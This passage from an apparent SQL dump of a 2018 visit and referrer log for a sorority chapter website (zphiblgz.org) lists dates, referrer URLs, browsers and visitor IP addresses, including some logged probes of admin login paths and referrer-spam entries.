,0),(29672,'2018-04-29','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATPWX5hxEz5f81wLbF4IlBa3H0_0T1PIBqHS8UTa364GT8uG6Dl_hqTrgs09tJ15e4xEjtB2tVFAP1weebXbpiyLKG0IinBiLwSz_xXJ3slXV77ddwYII36STbVPCQ','Chrome','Windows','41.0.2228.0','','173.252.98.118','000',1,0),(29673,'2018-04-29','https://mikozstop.com/','Opera','Windows','9.0','','37.115.185.9','000',1,0),(29674,'2018-04-29','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(29675,'2018-04-29','https://zphiblgz.org','Python-urllib','Unknown','2.7','','158.69.101.124','000',2,0),(29676,'2018-04-29','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.173.241.248','000',1,0),(29677,'2018-04-29','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(29678,'2018-04-29','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(29679,'2018-04-29','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(29680,'2018-04-29','https://www.bing.com/','MSIE','Windows','11.0','','50.253.27.177','000',6,0),(29681,'2018-04-29','https://brillianty.info/','MSIE','Windows','6.0','','46.118.114.175','000',2,0),(29682,'2018-04-29','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(29683,'2018-04-29','https://www.google.com/','Chrome','Android','66.0.3359.126','','73.39.186.188','000',3,0),(29684,'2018-04-29','http://zphiblgz.org/administrator/index.php','Opera Next','Windows','49.0.2711.0','','185.130.184.210','000',2,0),(29685,'2018-04-29','http://elvel.com.ua/','Opera','Windows','9.0','','46.118.114.175','000',1,0),(29686,'2018-04-29','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.81','','163.172.4.153','000',1,0),(29687,'2018-04-29','https://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(29688,'2018-04-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.215.95','000',8,0),(29689,'2018-04-30','http://zphiblgz.org/bitrix/admin/','Opera Next','Windows','49.0.2711.0','','185.130.184.210','000',2,0),(29690,'2018-04-30','https://bird1.ru/','Opera','Windows','7.60','','46.118.114.175','000',2,0),(29691,'2018-04-30','https://zphiblgz.org','Firefox','Windows','40.1','','110.32.130.158','000',2,0),(29692,'2018-04-30','http://incitystroy.ru/','MSIE','Windows','6.0','','178.137.165.61','000',1,0),(29693,'2018-04-30','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(29694,'2018-04-30','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(29695,'2018-04-30','https://distonija.com/','MSIE','Windows','5.0','','178.137.165.61','000',1,0),(29696,'2018-04-30','https://professionalsolutions.eu/ru/','Opera','Windows','9.0','','46.118.114.175','000',2,0),(29697,'2018-04-30','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(29698,'2018-04-30','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(29699,'2018-04-30','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.110.204','000',2,0),(29700,'2018-04-30','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.64.70','000',18,0),(29701,'2018-04-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.64.70','000',1,0),(29702,'2018-04-30','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(29703,'2018-04-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1773.K9pMfS7q722oEI3Za4xjA5yP83WzjiAimUwt5BMlRuI.fd24fa427be9c156a15b25a54e16ae14f975687a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WnBOaWQxUER1V0hfSGRGbGRscFk4MTY0T010UDNnSzRpNzkyTmZwbnZVdyws&sign=b7a2179e9ef4ff27477707d53ecef0c0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.191.22','000',2,0),(29704,'2018-04-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1773.PEKvw3JMi6hLIPn_gJhhpWMCu4w9IM7QMDrwpbGI6oQ.f6740863cbb5685bfa5ce61dff99a7b89a42b5c6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UlFnemw0cXlYOGxhT2FsSlMtU2JVZDhiZjVRZFZLeDBuWUhfRFM2ZnA5QSws&sign=04eae685e51752e2197dacff6529ef28&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.219.21','000',2,0),(29705,'2018-04-30','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(29706,'2018-04-30','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.131.56.97','000',1,0),(29707,'2018-04-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.194','000',1,0),(29708,'2018-04-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1773._boOgCKWVvngF9uDawg4FUdAoX-5aqBbZpCq4Q3moi8.9496dd5faa9501d5fb50e7309d21a636fbd1fd14&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NjBBM3VrWFJ1NVYtQ0V1OG1ub0JzWU9YTmx5N1VFaTJkREZKRUxOb0RPQSws&sign=43a0f938593f57188b86941a38a5ca04&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.46.90','000',2,0),(29709,'2018-04-30','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1773.uNKTYBKyz4YT6uouia1ZIUG_DYMGLBmwwLbA-NnJvNQ.26244e8c1ab0dee3f1bf0c906a1be2affbe8ef63&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043LVdGX3Bha0dNY3h5RlVYSXpJallmZmJ6Q3JVcHAzRXl0ME5JakVUVVFaQSws&sign=0b0078f4d224ed5bbd50877bf2ffe3c7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.226.31','000',2,0),(29710,'2018-04-30','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','153.31.112.20','000',5,0),(29711,'2018-04-30','https://www.google.com/','Chrome','Windows','65.0.3325.181','','68.201.81.23','000',2,0),(29712,'2018-04-30','https://goodhumor24.com/','MSIE','Unknown','6.0','','46.119.118.96','000',3,0),(29713,'2018-04-30','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','31.184.192.185','000',3,0),(29714,'2018-04-30','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.22','000',3,0),(29715,'2018-04-30','http://zphiblgz.org/user/login','Opera Next','Windows','49.0.2711.0','','185.130.184.218','000',4,0),(29716,'2018-04-30','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',2,0),(29717,'2018-04-30','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiYg46Oo-LaAhVIrlkKHYz1DmsQFghAMAQ&url=https%3A%2F%2Fzphiblgz.org%2Fevent%2Fhoward-county-volunteer-year-reception%2F&usg=AOvVaw0fK5isBNXkPnRQygA6QOr3','MSIE','Windows','11.0','','128.244.87.135','000',2,0),(29718,'2018-04-30','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(29719,'2018-04-30','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(29720,'2018-04-30','https://zphiblgz.org/','Safari','Macintosh','11.0.1','','31.130.20.61','000',2,0),(29721,'2018-04-30','https://zphiblgz.org/','Firefox','Windows','37.0','','31.130.20.61','000',2,0),(29722,'2018-04-30','https://zphiblgz.org/','Firefox','Windows','37.1','','77.120.125.23','000',2,0),(29723,'2018-04-30','https://zphiblgz.org/','Edge','Windows','12.10240','','31.130.20.61','000',2,0),(29724,'2018-04-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(29725,'2018-04-30','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(29726,'2018-04-30','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(29727,'2018-04-30','http://komputers-best.ru/','MSIE','Windows','6.0','','46.119.118.96','000',1,0),(29728,'2018-04-30','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(29729,'2018-04-30','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(29730,'2018-04-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.28','000',1,0),(29731,'2018-04-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(29732,'2018-04-30','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(29733,'2018-04-30','http://zphiblgz.org/index.php/admin/','Opera Next','Windows','49.0.2711.0','','185.130.184.223','000',3,0),(29734,'2018-04-30','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(29735,'2018-04-30','https://infodocsportal.com/','MSIE','Windows','6.0','','37.115.185.9','000',3,0),(29736,'2018-04-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.125.18','000',1,0),(29737,'2018-04-30','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','24.35.28.253','000',4,0),(29738,'2018-04-30','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29739,'2018-04-30','https://zphiblgz.org','Firefox','Macintosh','59.0','','216.145.11.94','000',2,0),(29740,'2018-04-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(29741,'2018-04-30','http://www.google.com/','Chrome','Android','64.0.3282.137','','100.16.225.236','000',13,0),(29742,'2018-04-30','http://start.toshiba.com/search/index.php?q=Zeta+phi+beta+sorority+inc.+multiple+choice+exam&context=news','Chrome','Windows','66.0.3359.139','','50.48.189.136','000',2,0),(29743,'2018-04-30','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29744,'2018-04-30','https://www.google.com/','Chrome','Windows','65.0.3325.181','','96.244.131.88','000',2,0),(29745,'2018-04-30','https://docs4all.com/','MSIE','Windows','5.5','','37.115.185.9','000',2,0),(29746,'2018-04-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.185.42.130','000',1,0),(29747,'2018-05-01','https://filesclub.net/','Unknown','Unknown','Unknown','','37.115.185.9','000',1,0),(29748,'2018-05-01','https://zphiblgz.org','Firefox','Windows','40.1','','189.216.165.179','000',2,0),(29749,'2018-05-01','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.177.212','000',2,0),(29750,'2018-05-01','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(29751,'2018-05-01','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',9,0),(29752,'2018-05-01','http://zphiblgz.org/netcat/admin/','Opera Next','Windows','49.0.2711.0','','185.130.184.223','000',4,0),(29753,'2018-05-01','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(29754,'2018-05-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',3,0),(29755,'2018-05-01','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.43','000',1,0),(29756,'2018-05-01','https://zphiblgz.org','MSIE','Windows','6.0','','45.55.224.77','000',1,0),(29757,'2018-05-01','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.254','000',1,0),(29758,'2018-05-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1774.5caCQqUdeF5lR4WwAnUxVc5_b8yLvObKapKYV_6Xkr8.2b33b37a87176027fea03e750ddc36173191f457&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WjFNb1JjbHpZaTR1UUpXR0dmaGtpYUlRYmdWbG5WQUhZVVplTS13cHprZyws&sign=2659ca38c05c9f27acbe36afa81b56c5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.155.167','000',2,0),(29759,'2018-05-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1774.9SMAE7JTpx7hJS1oKfAJ57t9Q4pIlWteeXtukh6ifZI.7f3b48503e35887260d11462c2efce3008edc84d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TkhLNldYeElETlpzd3Fzc0p5NmlfZWEyTC1Oc1Q4N0k1QzJvNm82R2pfZyws&sign=64a800c2918f2ef18526b309546018d1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.141.132','000',2,0),(29760,'2018-05-01','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1775.uZIPf2dqX5hIp2_tXiWYFAryXcvUiune3SZLxUu6gzcrEFirgu6mnxDETuzw1Rmw.281f7f0820795a86b1a54f0be0783539b7ebcd3a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVUVZdnZkYWhnSm54R0VNWlZLV1RVVXpjcHdENDZ5b1VWb08yTVBhcHMwcnJCTDdKYkdQVGxvUQ&b64e=2&sign=57a18eef752dc18f8c5f0edca764f694&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTqFZ0hq5qg6XAUxzT7ATHUnwSb5OvD-Y1a2iSVVFJXu42tgSjZvUNilz0YaeUtXCliEd1Jo6FySOe7_gKA5yE2aK3-U39-QWzg1SpX1C5e_CcEZhlprVwiTwWswFmL0Qb&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV25TmkfXuIlh__UOFhtkIw5jt2o0TughPf99xT7BHpyBVXMriwoPVmHbsKFzsNfOEpipuQpJpnOA&l10n=ru&cts=1525172325612&mc=7.40370044267','MSIE','Windows','8.0','','95.27.46.120','000',1,0),(29761,'2018-05-01','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(29762,'2018-05-01','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(29763,'2018-05-01','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(29764,'2018-05-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1774.kBlXJucNhxE-FAy9xnw9I5HfnHQQKRsNy9BXbDhIqec.d519382d567199cc3eacf020f8ff8c15283910ea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TlFkSVFUQnVHMW1NRzFOczFzUG1RbDBHUndCcG5FRlFIam8tWkg4QzNZZyws&sign=83cbcaf338c1db032b7de919f55e3406&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.118.74','000',2,0),(29765,'2018-05-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(29766,'2018-05-01','http://t-rec.su/','MSIE','Windows','6.0','','46.118.114.175','000',3,0),(29767,'2018-05-01','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29768,'2018-05-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(29769,'2018-05-01','https://mikozstop.com/','Opera','Windows','9.0','','37.115.185.9','000',1,0),(29770,'2018-05-01','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(29771,'2018-05-01','https://zphiblgz.org/scholarship/lgzscholarshipreleaseform/','AppleWebKit','Windows','534','','40.77.188.137','000',2,0),(29772,'2018-05-01','http://elvel.com.ua/','Unknown','Unknown','Unknown','','46.118.114.175','000',1,0),(29773,'2018-05-01','https://zphiblgz.org/','Firefox','Linux','57.0','','185.193.39.45','000',1,0),(29774,'2018-05-01','https://jobius.com.ua/','MSIE','Unknown','7.0b','','178.137.165.61','000',3,0),(29775,'2018-05-01','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.102.191.18','000',3,0),(29776,'2018-05-01','https://zphiblgz.org','Chrome','Windows','40.0.2214.93','','54.86.126.195','000',1,0),(29777,'2018-05-01','http://zphiblgz.org/wp-admin/','Firefox','Windows','3.5.0','','72.11.140.74','000',1,0),(29778,'2018-05-01','https://zphiblgz.org','MSIE','Windows','9.0','','72.11.140.74','000',2,0),(29779,'2018-05-01','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.189.93','000',1,0),(29780,'2018-05-01','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','184.154.189.91','000',1,0),(29781,'2018-05-01','http://zahvat.ru/','Opera','Windows','7.54','','46.119.118.96','000',2,0),(29782,'2018-05-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(29783,'2018-05-01','https://zphiblgz.org/','Firefox','Windows','30.0','','31.130.20.61','000',2,0),(29784,'2018-05-01','https://zphiblgz.org/','Firefox','Windows','43.1','','31.130.20.61','000',2,0),(29785,'2018-05-01','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(29786,'2018-05-01','https://zphiblgz.org','Python','Unknown','3.5','','35.188.69.47','000',2,0),(29787,'2018-05-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(29788,'2018-05-01','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1775.ZQiQyQR0xYH31EOcngf7_VCFOmddGpU3nKSrhCSrmmvsV8odgyloxeO9eqlVayl0.84b0de83da7e995602853a2e667ea0a4b5f233bf&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV3dLSVBxMzU2VURodU5aVFhQQl9DRlBfSkJoUUF2NXRPSUNEcGRoZ2JUS282bHJTU25IMFc5&b64e=2&sign=f1559db4acc9a7a03b158ad510bffd70&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTJEgNrMiSaSODZmlt1KnwEQ525wZOdXBsYARF-lLFSI1nyocJnDLOhiH4Cqfu7H4tav7WEXqsCM-huct7KqsQWcIkQbV3JsZrqdL5Tit9rglxH8j6cXL73w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWek7TThP_HnE8HSzEDVk3-eiFxtfATENRK2kyTOesAh0J3qcs4Dq4ullrYRd_aVV2ngRGtxLuVcw&l10n=ru&cts=1525205392670&mc=1.73428616946','MSIE','Windows','10.0','','176.193.116.125','000',1,0),(29789,'2018-05-01','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(29790,'2018-05-01','https://zphiblgz.org','Python-urllib','Unknown','2.7','','94.177.255.239','000',1,0),(29791,'2018-05-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(29792,'2018-05-01','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(29793,'2018-05-01','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29794,'2018-05-01','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(29795,'2018-05-01','http://www.google.com/','Chrome','Android','66.0.3359.126','','71.246.83.97','000',2,0),(29796,'2018-05-01','https://www.google.com/','Safari','iPad','9.0','','108.48.171.176','000',3,0),(29797,'2018-05-01','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','77.120.125.23','000',2,0),(29798,'2018-05-01','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(29799,'2018-05-01','https://yhirurga.ru/','MSIE','Windows','2.0d','','178.137.165.61','000',3,0),(29800,'2018-05-02','https://www.google.com/search?q=ebony+cogdell&ie=utf-8&oe=utf-8&client=firefox-b','Firefox','Android','59.0','','184.58.56.225','000',2,0),(29801,'2018-05-02','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(29802,'2018-05-02','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',1,0),(29803,'2018-05-02','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(29804,'2018-05-02','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.37','000',2,0),(29805,'2018-05-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.44','000',1,0),(29806,'2018-05-02','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(29807,'2018-05-02','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(29808,'2018-05-02','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(29809,'2018-05-02','https://zphiblgz.org/','Firefox','Windows','33.1','','31.130.20.61','000',2,0),(29810,'2018-05-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.190.167.19','000',4,0),(29811,'2018-05-02','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(29812,'2018-05-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1775.JfQEm1uEnLGgadVpfVcrXdnBXHEGojTmrNGTbHLF-A0.9689dc365c3380131a48218be6407c3a83b7e5f1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042MEc5X2pkMnRvdXlzX1ZTdjBTMVVmR0JXMFYtTnczOVhiTm1rWHNzTnU4QSws&sign=b1b432136208b2da2f695bab9225dbef&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.220.205','000',2,0),(29813,'2018-05-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1775.2SUnYeXMZtfhdBIijCJD-ubmLO2nP9T2uW-0T3eCLbE.a049478fcdbb7363987caf12ef757238af4559f8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QmJGTXBudXZ5dkw2NHE5UXpCU1ZEaEVaTGlpQXZOUFRJMjB5cVdUZFZSUSws&sign=bd3209032e86430d7bea18128ee6be98&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','67.205.177.51','000',2,0),(29814,'2018-05-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1775.kvRE2-vZeam3oxKV49TiAfrqbYtyQqz3JUqY6LVMZto.c2b6c620cd1bec99a443ccbb89f36fc719de48ae&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZEUybUlUOS1NaDJncVVlZWdWR1FVaU1HUVpzWmdaS2RFQ2hYQV9mRW01Zyws&sign=7100c5cd2841ef189c339da4c941fedd&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.226.171','000',2,0),(29815,'2018-05-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1775.-GVZF98M0MIUSC0ca8Ry35S41_3LupHB5se979JlHtc.0fbae227b91e37aa2c08136e0dc59aa09c4bb5ff&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043cC1hTl9mTV9DREZKeGUxX3F6Umx6YmZudzVZbkdVUzd3bE9jNWxTZGE1QSws&sign=c37ee6519b9cb5bf218c5c86d9e50650&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.99.10','000',2,0),(29816,'2018-05-02','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(29817,'2018-05-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(29818,'2018-05-02','https://zphiblgz.org/','Firefox','Windows','52.0','','149.202.50.209','000',1,0),(29819,'2018-05-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1775.0nc1pU3u-z6UeRZaomK2JwcZ3dEL49xC7dfINmwFe9k.3e86d2d56607648c6337fe5e9a240b7a1ec33b33&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZXAtanFzal9RUk40UTdyeDRaU2E0NmNIa3I0UVhDRUQ5ZTAyZldTd2xwQSws&sign=d364c8d0d115af4032d45ffd27cdbe1c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.175.32','000',2,0),(29820,'2018-05-02','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(29821,'2018-05-02','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(29822,'2018-05-02','https://zphiblgz.org/','Chrome','Windows','65.0.3325.181','','167.102.191.18','000',4,0),(29823,'2018-05-02','https://www.bing.com/','Edge','Windows','16.16299','','216.227.255.94','000',2,0),(29824,'2018-05-02','https://zphiblgz.org/event/breakfast-on-the-go/','AppleWebKit','Windows','534','','40.77.189.129','000',1,0),(29825,'2018-05-02','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjsvcGBpufaAhXNuFMKHeL1DPUQFggsMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','24.173.169.138','000',5,0),(29826,'2018-05-02','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(29827,'2018-05-02','https://zphiblgz.org/','Firefox','Windows','57.0','','77.120.125.23','000',2,0),(29828,'2018-05-02','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(29829,'2018-05-02','https://univerfiles.com/','MSIE','Windows','6.0','','37.115.185.9','000',6,0),(29830,'2018-05-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(29831,'2018-05-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.220','000',1,0),(29832,'20